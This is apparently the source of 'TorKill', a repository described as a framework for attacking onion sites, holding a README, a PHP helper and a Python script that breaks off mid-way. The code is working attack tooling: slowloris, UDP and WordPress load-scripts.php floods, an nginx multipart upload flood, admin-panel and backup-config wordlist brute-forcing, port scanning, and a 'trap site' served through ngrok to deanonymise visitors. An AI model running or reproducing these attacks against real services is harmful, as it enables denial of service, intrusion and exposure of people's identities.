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584 | Later license versions may give you additional or different
585 | permissions. However, no additional obligations are imposed on any
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588 |
589 | 15. Disclaimer of Warranty.
590 |
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611 |
612 | 17. Interpretation of Sections 15 and 16.
613 |
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618 | Program, unless a warranty or assumption of liability accompanies a
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622 |
623 | How to Apply These Terms to Your New Programs
624 |
625 | If you develop a new program, and you want it to be of the greatest
626 | possible use to the public, the best way to achieve this is to make it
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630 | to attach them to the start of each source file to most effectively
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652 | If the program does terminal interaction, make it output a short
653 | notice like this when it starts in an interactive mode:
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/README.md:
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1 | 
2 |
3 |
4 | This is a demo version of the program to attack onion resources. Programs are best used in conjunction with onionscan: https://github.com/s-rah/onionscan
5 |
6 | Program description: https://codeby.net/forum/threads/torkill-frejmvork-dlja-ataki-na-onion-resursy.64150/
7 |
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/Site.php:
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1 | '.$ip.'
';
7 |
8 | if(isset($_GET['head'])){
9 | $a = get_headers($host);
10 | foreach($a as $head){
11 | echo ''.'
';
12 | }
13 | }
14 |
15 |
16 |
17 | if(isset($_GET['word'])){
18 | $direc = array('info.php', 'robots.txt', 'wp-config.php~','wp-config.php.save','test.php','wp-config.php.swp','wp-config.php.swp','wp-config.php.swo','wp-config.php_bak','index.php.bak','wp-config.old','wp-config.php1','wp-config.php2','wp-config.php.tmp','wp-config-backup.php','wp-config.bak', 'wp-config.php.bak', 'wp-config.save', 'wp-config.old', 'wp-config.php.old','wp-config.php.orig','wp-config.orig','wp-config.php.original', 'wp-config.original','wp-config.txt','.git','.svn','.htaccess','.git/info');
19 |
20 | foreach ($direc as $dir) {
21 | $res = get_headers($host.$dir);
22 | if(preg_match("|200|", $res[0])) {
23 | echo "$dir found
";
24 | }else{
25 | echo "$dir not found
";
26 | }
27 | }
28 | }
29 |
30 |
31 | if(isset($_GET['find'])){
32 | $admin = array("admin","administrator","adm","login","loign.php","administrator.php","admins.php","logins","admincp","admincp.php","admin1.php", "admin1.html", "admin2.php", "admin2.html", "yonetim.php", "yonetim.html", "yonetici.php", "yonetici.html", "ccms/", "ccms/login.php", "ccms/index.php", "maintenance/", "webmaster/", "adm/", "configuration/", "configure/", "websvn/", "admin/", "admin/account.php", "admin/account.html". "admin/index.php", "admin/index.html", "admin/login.php","admin/login.html", "admin/home.php", "admin/controlpanel.html", "admin/controlpanel.php", "admin.php", "admin.html", "admin/cp.php", "admin/cp.html", "cp.php", "cp.html", "administrator/","administrator/index.html", "administrator/index.php", "administrator/login.html", "administrator/login.php", "administrator/account.html", "administrator/account.php", "administrator.php","administrator.html", "login.php", "login.html", "modelsearch/login.php", "moderator.php", "moderator.html", "moderator/login.php", "moderator/login.html","moderator/admin.php","moderator/admin.html", "moderator/", "account.php", "account.html", "controlpanel/", "controlpanel.php", "controlpanel.html", "admincontrol.php", "admincontrol.html", "adminpanel.php","adminpanel.html", "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp", "admin/account.asp", "admin/index.asp", "admin/login.asp", "admin/home.asp", "admin/controlpanel.asp", "admin.asp", "admin/cp.asp", "cp.asp", "administrator/index.asp","administrator/login.asp","administrator/account.asp","administrator.asp", "login.asp", "modelsearch/login.asp", "moderator.asp","moderator/login.asp", "moderator/admin.asp", "account.asp", "controlpanel.asp", "admincontrol.asp", "adminpanel.asp", "fileadmin/", "fileadmin.php", "fileadmin.asp", "fileadmin.html","administration/", "administration.php", "administration.html", "sysadmin.php", "sysadmin.html", "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-admin.asp", "ur-admin.php","ur-admin.html", "ur-admin/", "Server.php", "Server.html", "Server.asp", "Server/", "wp-admin/", "administr8.php", "administr8.html", "administr8/", "administr8.asp", "webadmin/", "webadmin.php","webadmin.asp", "webadmin.html", "administratie/", "admins/", "admins.php", "admins.asp", "admins.html", "administrivia/", "Database_Administration/", "WebAdmin/", "useradmin/", "sysadmins/","admin1/", "system-administration/", "administrators/", "pgadmin/", "directadmin/", "staradmin/", "ServerAdministrator/", "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/", "typo3/","panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_login/", "rcLogin/", "blogindex/", "formslogin/", "autologin/", "support_login/", "meta_login/", "manuallogin/", "simpleLogin/", "loginflat/","utility_login/", "showlogin/", "memlogin/", "members/", "login-redirect/", "sub-login/", "wp-login/", "login1/", "dir-login/", "login_db/", "xlogin/", "smblogin/", "customer_login/", "UserLogin/","login-us/", "acct_login/", "admin_area/", "bigadmin/", "project-admins/", "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/", "openvpnadmin/", "wizmysqladmin/", "vadmind/", "ezsqliteadmin/","hpwebjetadmin/", "newsadmin/", "adminpro/", "Lotus_Domino_Admin/", "bbadmin/", "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-macadmin/","banneradmin/","sshadmin/","phpldapadmin/","macadmin/","administratoraccounts/", "admin4_account/","admin4_colon/","radmind-1/","SuperAdmin/","AdminTools/","cmsadmin/","SysAdmin2/","globes_admin/","cadmins/","phpSQLiteAdmin/", "navSiteAdmin/","server_admin_small/","logo_sysadmin/","server/","database_administration/","power_user/", "system_administration/", "ss_vms_admin_sm/", "admin/","administrator/","admin1/","admin2/","admin3/","admin4/","admin5/","usuarios/","usuario/","administrator/","moderator/","webadmin/","adminarea/","bb-admin/","adminLogin/","admin_area/","panel-administracion/","instadmin/","memberadmin/","administratorlogin/","adm/","admin/account.js","admin/index.js","admin/login.js","admin/admin.js","admin/account.js","admin_area/admin.js","admin_area/login.js","siteadmin/login.js","siteadmin/index.js","siteadmin/login.html","admin/account.html","admin/index.html","admin/login.html","admin/admin.html","admin_area/index.js","bb-admin/index.js","bb-admin/login.js","bb-admin/admin.js","admin/home.js","admin_area/login.html","admin_area/index.html","admin/controlpanel.js","admin.js","admincp/index.asp","admincp/login.asp","admincp/index.html","admin/account.html","adminpanel.html","webadmin.html","webadmin/index.html","webadmin/admin.html","webadmin/login.html","admin/admin_login.html","admin_login.html","panel-administracion/login.html","admin/cp.js","cp.js","administrator/index.js","administrator/login.js","nsw/admin/login.js","webadmin/login.js","admin/admin_login.js","admin_login.js","administrator/account.js","administrator.js","admin_area/admin.html","pages/admin/admin-login.js","admin/admin-login.js","admin-login.js","bb-admin/index.html","bb-admin/login.html","bb-admin/admin.html","admin/home.html","login.js","modelsearch/login.js","moderator.js","moderator/login.js","moderator/admin.js","account.js","pages/admin/admin-login.html","admin/admin-login.html","admin-login.html","controlpanel.js","admincontrol.js","admin/adminLogin.html","adminLogin.html","admin/adminLogin.html","home.html","rcjakar/admin/login.js","adminarea/index.html","adminarea/admin.html","webadmin.js","webadmin/index.js","acceso.js","webadmin/admin.js","admin/controlpanel.html","admin.html","admin/cp.html","cp.html","adminpanel.js","moderator.html","administrator/index.html","administrator/login.html","user.html","administrator/account.html","administrator.html","login.html","modelsearch/login.html","moderator/login.html","adminarea/login.html","panel-administracion/index.html","panel-administracion/admin.html","modelsearch/index.html","modelsearch/admin.html","admincontrol/login.html","adm/index.html","adm.html","moderator/admin.html","user.js","account.html","controlpanel.html","admincontrol.html","panel-administracion/login.js","wp-login.js","adminLogin.js","admin/adminLogin.js","home.js","admin.js","adminarea/index.js","adminarea/admin.js","adminarea/login.js","panel-administracion/index.js","panel-administracion/admin.js","modelsearch/index.js","modelsearch/admin.js","admincontrol/login.js","adm/admloginuser.js","admloginuser.js","admin2.js","admin2/login.js","admin2/index.js","usuarios/login.js","adm/index.js","adm.js","affiliate.js","adm_auth.js","memberadmin.js","administratorlogin.js","admin/","administrator/","admin1/","admin2/","admin3/","admin4/","admin5/","usuarios/","usuario/","administrator/","moderator/","webadmin/","adminarea/","bb-admin/","adminLogin/","admin_area/","panel-administracion/","instadmin/","memberadmin/","administratorlogin/","adm/","admin/account.brf","admin/index.brf","admin/login.brf","admin/admin.brf","admin/account.brf","admin_area/admin.brf","admin_area/login.brf","siteadmin/login.brf","siteadmin/index.brf","siteadmin/login.html","admin/account.html","admin/index.html","admin/login.html","admin/admin.html","admin_area/index.brf","bb-admin/index.brf","bb-admin/login.brf","bb-admin/admin.brf","admin/home.brf","admin_area/login.html","admin_area/index.html","admin/controlpanel.brf","admin.brf","admincp/index.asp","admincp/login.asp","admincp/index.html","admin/account.html","adminpanel.html","webadmin.html","webadmin/index.html","webadmin/admin.html","webadmin/login.html","admin/admin_login.html","admin_login.html","panel-administracion/login.html","admin/cp.brf","cp.brf","administrator/index.brf","administrator/login.brf","nsw/admin/login.brf","webadmin/login.brfbrf","admin/admin_login.brf","admin_login.brf","administrator/account.brf","administrator.brf","acceso.brf","admin_area/admin.html","pages/admin/admin-login.brf","admin/admin-login.brf","admin-login.brf","bb-admin/index.html","bb-admin/login.html","bb-admin/admin.html","admin/home.html","login.brf","modelsearch/login.brf","moderator.brf","moderator/login.brf","moderator/admin.brf","account.brf","pages/admin/admin-login.html","admin/admin-login.html","admin-login.html","controlpanel.brf","admincontrol.brf","admin/adminLogin.html","adminLogin.html","admin/adminLogin.html","home.html","rcjakar/admin/login.brf","adminarea/index.html","adminarea/admin.html","webadmin.brf","webadmin/index.brf","webadmin/admin.brf","admin/controlpanel.html","admin.html","admin/cp.html","cp.html","adminpanel.brf","moderator.html","administrator/index.html","administrator/login.html","user.html","administrator/account.html","administrator.html","login.html","modelsearch/login.html","moderator/login.html","adminarea/login.html","panel-administracion/index.html","panel-administracion/admin.html","modelsearch/index.html","modelsearch/admin.html","admincontrol/login.html","adm/index.html","adm.html","moderator/admin.html","user.brf","account.html","controlpanel.html","admincontrol.html","panel-administracion/login.brf","wp-login.brf","adminLogin.brf","admin/adminLogin.brf","home.brf","admin.brf","adminarea/index.brf","adminarea/admin.brf","adminarea/login.brf","panel-administracion/index.brf","panel-administracion/admin.brf","modelsearch/index.brf","modelsearch/admin.brf","admincontrol/login.brf","adm/admloginuser.brf","admloginuser.brf","admin2.brf","admin2/login.brf","admin2/index.brf","usuarios/login.brf","adm/index.brf","adm.brf","affiliate.brf","adm_auth.brf","memberadmin.brf","administratorlogin.brf");
33 | foreach ($admin as $shell){
34 | $headers = get_headers($host.$shell);
35 | if(stristr($headers[0],"200")){
36 | echo "$host$shell Founded!";
37 | }
38 | }
39 | }
40 |
41 | if(isset($_GET['port'])){
42 | //list of port numbers to scan
43 | $ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);
44 |
45 | $results = array();
46 | foreach($ports as $port) {
47 | if($pf = @fsockopen($host, $port, $err, $err_string, 1)) {
48 | $results[$port] = true;
49 | fclose($pf);
50 | } else {
51 | $results[$port] = false;
52 | }
53 | }
54 |
55 | foreach($results as $port=>$val) {
56 | $prot = getservbyport($port,"tcp");
57 | echo "Port $port ($prot): ";
58 | if($val) {
59 | echo "OK
";
60 | }
61 | else {
62 | echo "Inaccessible
";
63 | }
64 | }
65 | }
66 |
67 | if(isset($_GET['slowloris'])){
68 | for ($z = 0; $z <= $requests; $z++){
69 |
70 |
71 | if (!empty($cache)) {
72 | $rand = "?" . int( rand(99999999999999) );
73 | }
74 | else {
75 | $rand = "";
76 | }
77 | $sock[$z]=fsockopen($host,80,$errno,$errstr,$timeout);
78 | $primarypayload ="GET /$rand HTTP/1.1\r\n";
79 | $primarypayload .="Host: $sendhost\r\n";
80 | $primarypayload .="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n";
81 | $primarypayload .="Content-Length: 42\r\n";
82 | fwrite($sock[$z],$primarypayload);
83 | if ($errno!=0) {
84 |
85 | fclose($sock[$z]);
86 | $failed++;
87 | $failedconnections++;
88 | }
89 |
90 |
91 |
92 | else {
93 | $packetcount++;
94 |
95 | }
96 | }
97 | for($z=0;$z<=$requests;$z++){
98 | fclose($sock[$z]);
99 | }
100 | }
101 |
102 | if(isset($_GET['nginx'])){
103 |
104 | $ssl = false;
105 | $ip = '';
106 | $path = '/';
107 | $file = 'Hello, you are attacked.';
108 | $scheme = ($ssl ? 'ssl://' : '');
109 | $files = 20;
110 | $gvars = 1000;
111 | $grepeat = 1;
112 | $EOL = "\r\n";
113 | $body = '';
114 |
115 | for($i = 0; $i < $files; $i++){
116 | $body.='-----------------------------xxxxxxxxxxxx'.$EOL;
117 | $body.='Content-Disposition: form-data; name="future_temporary_file[]"; filename="future_temporary_file"'.$EOL;
118 | $body.='Content-Type: text/plain'.$EOL;
119 | $body.= $EOL;
120 | $body.= $file.$EOL;
121 | }
122 |
123 | for($i = 0; $i < $gvars; $i++){
124 | $body.='-----------------------------xxxxxxxxxxxx'.$EOL;
125 | $body.='Content-Disposition: form-data; name="some_garbage['.$i.']"'.$EOL;
126 | $body.= str_repeat('A', $grepeat).$EOL;
127 | $body.= $EOL;
128 | }
129 |
130 | $body.='-----------------------------xxxxxxxxxxxx--';
131 |
132 | $header ='POST '.$path.' HTTP/1.1'.$EOL;
133 | $header.='Content-Type: multipart/form-data; boundary=---------------------------xxxxxxxxxxxx'.$EOL;
134 | $header.='User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:56.0) Gecko/20160101 Firefox/56.0'.$EOL;
135 | $header.='Host: '.$host.$EOL;
136 | $header.='Content-Length: '.strlen($body).$EOL;
137 | $header.='Connection: close'.$EOL.$EOL;
138 |
139 | echo $EOL.($requests * $files).' files will be sent to '.$host.$EOL.$EOL;
140 |
141 | for($i = 1; $i <= $requests; $i++){
142 | echo 'Sending files #'.$i.' ';
143 | $fp = stream_socket_client($scheme.($ip ? $ip : $host).':'.($scheme ? 443 : 80), $errno, $errstr, 30);
144 | fwrite($fp, $header.$body);
145 | stream_socket_shutdown($fp, STREAM_SHUT_RDWR);
146 | fclose($fp);
147 | usleep(10000);
148 | }
149 | }
150 |
151 | ?>
152 |
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/TorKill.py:
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1 | # -*- coding: utf-8 -*-
2 |
3 | import threading, socks, time, random, socket, string, requests, sys, urllib2, re, argparse, paramiko, hashlib, base64, json, os
4 | import subprocess as subp
5 | from BeautifulSoup import *
6 | from sockshandler import SocksiPyHandler
7 | from colorama import init, Fore, Back, Style
8 |
9 |
10 | print("""
11 |
12 |
13 | ████████╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗ ██╗
14 | ╚══██╔══╝██╔═══██╗██╔══██╗██║ ██╔╝██║██║ ██║
15 | ██║ ██║ ██║██████╔╝█████╔╝ ██║██║ ██║
16 | ██║ ██║ ██║██╔══██╗██╔═██╗ ██║██║ ██║
17 | ██║ ╚██████╔╝██║ ██║██║ ██╗██║███████╗███████╗
18 | ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚══════╝╚══════╝
19 |
20 | Connecting to the Tor...
21 |
22 | [+]███████████████████████████████[+]
23 | """)
24 |
25 | print(Fore.GREEN + " [+] " + Fore.WHITE + " Version 0.2")
26 |
27 | print(Fore.WHITE + """
28 | {1} Directory Brute {2} Wordpress DoS
29 | {3} Admin Finder {4} SLowloris
30 | {5} Nginx DoS {6} Link Grabber
31 | {7} Port Scanner {8} Show HTTP Header
32 | {9} Fingerprint {10} Trap Site
33 |
34 | """)
35 |
36 |
37 | host = 'http://ddosogyyqstchmnx.onion'
38 |
39 | global proxies
40 | proxies = { 'http': 'socks5h://127.0.0.1:9050', 'https': 'socks5h://127.0.0.1:9050' }
41 |
42 | global useragents
43 | useragents = [ "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)",
44 | "Googlebot/2.1 (http://www.googlebot.com/bot.html)", "Opera/9.20 (Windows NT 6.0; U; en)", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)",
45 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)", "Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0", "Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16",
46 | "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13"
47 | "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)", "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
48 | "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)", "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)",
49 | "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
50 | "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)" ]
51 |
52 | global referers
53 | referers = [ "https://www.google.com.hk/#newwindow=1&q=", "http://www.usatoday.com/search/results?q=", "http://www.baidu.com/s?wd=", "http://engadget.search.aol.com/search?q=", 'http://www.usatoday.com/search/results?q=',
54 | 'http://engadget.search.aol.com/search?q=', 'http://www.google.com/?q=', 'http://engadget.search.aol.com/search?q=', 'http://www.bing.com/search?q=', 'http://search.yahoo.com/search?p=', 'http://www.ask.com/web?q=',
55 | 'http://boorow.com/Pages/site_br_aspx?query=', 'http://search.lycos.com/web/?q=', 'http://busca.uol.com.br/web/?q=', 'http://us.yhs4.search.yahoo.com/yhs/search?p=','http://www.dmoz.org/search/search?q=',
56 | 'http://www.baidu.com.br/s?usm=1&rn=100&wd=', 'http://yandex.ru/yandsearch?text=', 'http://www.zhongsou.com/third?w=','http://hksearch.timway.com/search.php?query=', 'http://find.ezilon.com/search.php?q=',
57 | 'http://www.sogou.com/web?query=', 'http://api.duckduckgo.com/html/?q=' ]
58 |
59 | global headers
60 | headers = { 'User-Agent': random.choice(useragents), 'Connection': 'keep-alive', 'Keep-Alive': str(random.choice(range(110,120))), 'Referer': random.choice(referers) }
61 |
62 | global randstr
63 | randstr = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(random.choice(range(50,100))))
64 |
65 | regular_headers = [
66 | "User-agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
67 | "Accept-language: en-US,en,q=0.5"
68 | ]
69 |
70 | def attack1(host, port):
71 | foo = ['GET', 'POST']
72 | http = random.choice(foo)
73 | try:
74 | socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", port, True)
75 | s = socks.socksocket()
76 | s.connect((host, 80))
77 | s.send(http + " / HTTP/1.1\r\n"
78 | "Host: %s\r\n"
79 | "User-Agent: %s\r\n"
80 | "Connection: keep-alive\r\n"
81 | "Keep-Alive: 900\r\n"
82 | "Accept: text/html\r\n"
83 | "Referer: %s\r\n"
84 | "Content-Length: 10000\r\n"
85 | "Content-Type: application/x-www-form-urlencoded\r\n\r\n" %
86 | (host, random.choice(useragents), random.choice(referers)+ str(randstr)))
87 |
88 | s.send("HEAD / HTTP/1.0\r\n"
89 | "Host: %s\r\n"
90 | "Connection: Close\r\n"
91 | "User-Agent: %s\r\n"
92 | "Referer: %s\r\n"
93 | "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n\r\n" %
94 | (host, random.choice(useragents), random.choice(referers) + str(randstr)))
95 | for i in range(0, 399):
96 | s.send(randstr)
97 | except:
98 | print(' Error1')
99 |
100 |
101 | def attack2(host1, port):
102 | try:
103 | opener = urllib2.build_opener(SocksiPyHandler(socks.SOCKS5, "127.0.0.1", port, True))
104 | opener.addheaders = [('User-Agent', random.choice(useragents))]
105 | opener.addheaders = [('Cache-Control', 'no-cache')]
106 | opener.addheaders = [('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')]
107 | opener.addheaders = [('Referer', random.choice(referers) + str(randstr))]
108 | opener.addheaders = [('Keep-Alive', random.randint(110,120))]
109 | opener.addheaders = [('Connection', 'keep-alive')]
110 | opener.addheaders = [('Host',host1)]
111 | except:
112 | print(' Error2')
113 | # sys.stdout.write('0\n')
114 |
115 | def attack3(host, port):
116 | try:
117 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
118 | bytes = random._urandom(1024)
119 | s.sendto(bytes, (host, port))
120 | except:
121 | print(' Error3')
122 |
123 | def wordpress(host, count):
124 | path = '''/wp-admin/load-scripts.php?c=1&load[]=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,
125 | wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,
126 | scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,
127 | jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,
128 | jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,
129 | jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,
130 | jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,
131 | jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,
132 | jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,
133 | masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,
134 | json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,
135 | wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,
136 | password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,
137 | customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,
138 | customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,
139 | media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,
140 | admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,
141 | theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,
142 | nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9.1'''
143 | for i in range(0, count):
144 | requests.get(host + path, verify=False, stream=True, headers=headers, proxies=proxies)
145 |
146 | # ---- slowloris ----
147 | def init_socket(target1):
148 | socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050, True)
149 | s = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
150 | s.connect((target1, 80))
151 | s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0,2000)).encode('UTF-8'))
152 | for header in regular_headers:
153 | s.send('{}\r\n'.format(header).encode('UTF-8'))
154 | return s
155 |
156 | def slowloris(target1, count):
157 | socket_list=[]
158 | for _ in range(int(count)):
159 | try:
160 | s=init_socket(target1)
161 | except socket.error:
162 | break
163 | socket_list.append(s)
164 | while True:
165 | for s in socket_list:
166 | try:
167 | s.send("X-a {}\r\n".format(random.randint(1,5000)).encode('UTF-8'))
168 | except socket.error:
169 | socket_list.remove(s)
170 | for _ in range(int(count) - len(socket_list)):
171 | try:
172 | s=init_socket(target1)
173 | if s:
174 | socket_list.append(s)
175 | except socket.error:
176 | print(' Error4')
177 |
178 |
179 | def deanon():
180 | site = 'php/index.php'
181 | api = 'http://localhost:4040/api/tunnels'
182 | print('\n' + Fore.GREEN + ' [+]' + Fore.WHITE + ' Starting Apache Server...')
183 | subp.check_output(['service', 'apache2', 'start'])
184 | print('\n' + Fore.GREEN + ' [+]' + Fore.WHITE + ' Starting Ngrok...' + '\n')
185 | subp.Popen(['ngrok', 'http', '80'], stdin=subp.PIPE,stderr=subp.PIPE, stdout=subp.PIPE)
186 | time.sleep(10)
187 | r1 = requests.get(api)
188 | page = r1.content
189 | json1 = json.loads(page)
190 | for item in json1['tunnels']:
191 | if item['proto'] == 'https':
192 | print(Fore.GREEN + ' [+]' + Fore.WHITE + ' Trap URL: '+ item['public_url'] + '/' + site + '\n')
193 |
194 |
195 | def checkdirec(direc):
196 | try :
197 | responce = requests.get(target + direc, headers=headers, proxies=proxies)
198 | if (responce.status_code == 200):
199 | code = 200
200 | print(Fore.GREEN + ' Directory ' + direc + ' found')
201 | else:
202 | code = 0
203 | print(Fore.WHITE + ' Directory ' + direc + ' not found')
204 | except:
205 | print(Fore.WHITE + ' Directory ' + direc + ' not found')
206 |
207 |
208 | def linkgrab(target):
209 | html_page = requests.get(target, proxies=proxies).text
210 | soup = BeautifulSoup(html_page)
211 | for link in soup.findAll('a'):
212 | print(' ' + link.get('href'))
213 |
214 |
215 | def pscan(target1, i, port):
216 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
217 | socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", port, True)
218 | s = socks.socksocket()
219 | try:
220 | con = s.connect((target1, i))
221 | print(Fore.GREEN + ' ' + str(i)) + ' -> open'
222 | except:
223 | print(Fore.WHITE + ' ' + str(i)) + ' -> close'
224 |
225 |
226 | def fingerprint(target1, port):
227 | try:
228 | socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", port, True)
229 | mySocket = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
230 | mySocket.connect((target1, 22))
231 | except:
232 | print(Fore.WHITE + "Error opening socket")
233 | exit()
234 |
235 | try:
236 | myTransport = paramiko.Transport(mySocket)
237 | myTransport.start_client()
238 | sshKey = myTransport.get_remote_server_key()
239 | except:
240 | print(Fore.WHITE + "SSH error")
241 | exit()
242 | myTransport.close()
243 | mySocket.close()
244 | printableType = sshKey.get_name()
245 | printableKey = base64.encodestring(sshKey.__str__()).replace('\n', '')
246 | sshFingerprint = hashlib.md5(sshKey.__str__()).hexdigest()
247 | printableFingerprint = ':'.join(a+b for a,b in zip(sshFingerprint[::2], sshFingerprint[1::2]))
248 | print "HostKey Type: %s, Key: %s (Fingerprint: %s)" %(printableType, printableKey, printableFingerprint)
249 |
250 |
251 | def threads(type, num, args1, args2):
252 | threads = []
253 | for n in range(int(num)):
254 | t1 = threading.Thread(target=type, args=(args1, args2))
255 | t1.daemon = True
256 | t1.start()
257 | threads.append(t1)
258 |
259 |
260 | def usage():
261 | print("""
262 | usage:
263 | DoS: python tor.py -u http://target.onion/ -t 100 or -c 100
264 | Wordpress/nginx/slowloris/: python tor.py -u http://target.onion/ -t 100 -a {} -c 100
265 | """)
266 | exit()
267 |
268 |
269 | parser = argparse.ArgumentParser()
270 | parser.add_argument("-a", help="Type attack")
271 | parser.add_argument("-u", help="Target")
272 | parser.add_argument("-t", default=10, help="Thread")
273 | parser.add_argument("-c", default=50, help="Count")
274 |
275 | args = parser.parse_args()
276 |
277 | target = args.u
278 | thread = args.t
279 | attack = args.a
280 | count = args.c
281 |
282 |
283 | if(target == None):
284 | usage()
285 |
286 | if target[-1] == '/':
287 | target1 = target[7:-1]
288 | else:
289 | target1 = target[7:]
290 |
291 | data = requests.get(host + '?host=' + target1, headers=headers, proxies=proxies).text
292 | responce = requests.get(target, headers=headers, proxies=proxies)
293 |
294 | exitnode = re.findall(r'(.*?)', data, re.DOTALL)
295 |
296 | exitnode = ''.join(exitnode)
297 |
298 | print(Fore.GREEN + ' [+] ' + Fore.WHITE + 'Server: ' + responce.headers.get('Server'))
299 | print(Fore.GREEN + ' [+] ' + Fore.WHITE + 'Exit node: ' + exitnode + '\n')
300 |
301 | if(attack == '1'):
302 | data = requests.get('http://pastebin.com/raw/QwjrgKj2', headers=headers, proxies=proxies).text
303 | for x in re.split(r'\s+', data):
304 | checkdirec(x)
305 | elif(attack == '2'):
306 | threads(wordpress, thread, target, count)
307 | exit()
308 | elif(attack == '3'):
